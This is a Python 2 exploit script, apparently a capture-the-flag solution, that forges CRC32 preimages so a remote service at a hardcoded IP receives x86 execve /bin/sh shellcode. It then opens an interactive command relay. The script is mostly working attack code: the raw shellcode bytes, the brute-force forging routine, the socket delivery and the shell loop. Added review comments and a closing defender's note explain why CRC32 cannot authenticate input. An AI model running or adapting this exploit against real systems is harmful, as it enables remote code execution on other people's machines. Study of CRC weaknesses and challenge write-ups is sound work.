Description:
CRC32 preimage attack (with x86 execve shellcode!)
from binascii import crc32
from socket import *
from struct import *
# Flat Python 2 script (print statements, str.decode('hex'), raw_input): it
# connects to a remote service, reads a hex-encoded salt from the banner,
# and then, for each 4-byte chunk of `shellcode`, searches for 4 bytes whose
# CRC32 (chained after crc32(salt)) is shaped by that chunk.  The original
# indentation was lost in this paste; the nesting described in the comments
# below is inferred from data flow and should be verified before reuse.
# NOTE(review): the socket is never closed (no close()/with), and every
# recv(1024) assumes the whole message arrives in a single read.
mysocket = socket(AF_INET, SOCK_STREAM)
mysocket.connect(("54.178.232.195",5757))
payload = []
d = mysocket.recv(1024)
# Assumes a fixed 6-byte prefix and one trailing byte (presumably "\n")
# around the hex salt -- TODO confirm against the actual banner format.
salt = d[6:-1].decode('hex')
# Starting CRC state; every later chunk search chains from this value.
org_crc = crc32(salt)
# Dead assignment: the `for offset in ...` loop below rebinds it before use.
offset = 0
# Table indexed by the TOP byte of crc32(single byte, init 0), holding the
# full 32-bit CRC.  The code relies on those 256 top bytes being distinct;
# if two bytes shared one, the later entry would silently overwrite it.
v_crc_table = [0] * 256
for i in range(256):
v_crc_table[(crc32(chr(i), 0) & 0xffffffff) >> 24] = (crc32(chr(i), 0) & 0xffffffff)
# Target bytes, processed 4 at a time (the trailing "\x90" pads the length
# so the last chunk is also 4 bytes: 24 bytes in total).
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69""\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90"
for offset in range(0, len(shellcode), 4):
# r accumulates the 4 found input bytes for this chunk.
r=''
# Each chunk is searched independently from the same post-salt state.
old_crc = org_crc
s = shellcode[offset:offset+4]
# a[k] = table entry chosen from the chunk's bytes, taken last byte first;
# each later entry XORs in the overlapping bytes of the earlier entries
# (the `ss >> (j * 8)` mask selects one byte of each previous CRC).
a = []
c = ord(s[-1])
d = v_crc_table[c]
a.append(d & 0xffffffff)
for i in range(2,5):
c = ord(s[-i])
s_c = c
ss = 0x00ff0000
for j, cc in enumerate(a[::-1]):
s_c ^= (cc & (ss >> (j * 8)) ) >> (16-j*8)
a.append(v_crc_table[s_c] & 0xffffffff)
# Debug output only; position relative to the i-loop is not recoverable
# from the paste.
print list(enumerate(a[::-1]))
print a
print "\n".join(map(lambda x:hex(x)[2:].zfill(8),a))
print '================='
print a
# Per output byte j, brute-force the one input byte (<= 256 CRC trials)
# whose next CRC state has the required top byte, then advance the state.
# NOTE(review): if no byte matches, the inner loop falls through with
# i == 255 and nothing is appended to r, so the failure goes unnoticed and
# the chunk comes out short.
for j in range(4):
for i in range(256):
if (crc32(chr(i), old_crc) & 0xffffffff) >> 24 == (a[-j-1] >> 24):
r+=chr(i)
break
# Uses the `i` left over from the inner loop (the matched byte, or 255).
old_crc = crc32(chr(i), old_crc) & 0xffffffff
print r.encode('hex')
payload.append(r)
# Diagnostics: the wire encoding below, and crc32(salt + chunk) for each
# chunk -- presumably meant to be compared against the shellcode chunks.
print pack("I", len(payload)).encode("hex") + ''.join(map(lambda a: a.encode("hex"), payload))
print map(hex, map(lambda x: x & 0xffffffff, map(lambda x: crc32(salt+x), payload)))
# Wire format as sent: count, then (length, bytes) per chunk.  pack("I")
# is native byte order and size, so this is only portable between hosts
# that agree on both.
mysocket.send(pack("I", len(payload)))
for string in payload:
mysocket.send(pack("I", len(string)) + string)
# Interactive relay; a single recv() per command may truncate replies.
while True:
mysocket.send(raw_input("$ ")+"\n")
print mysocket.recv(1024)
# Defender's note: this works because CRC32 is a linear error-detecting
# code, not a cryptographic hash -- the search above needs at most 4 * 256
# CRC evaluations per 4-byte output, and the salt does not help once
# crc32(salt) is known.  A service that must bind untrusted input to a
# value an attacker cannot choose should use a keyed MAC (HMAC) or a
# collision-resistant hash (SHA-2/SHA-3), never a CRC.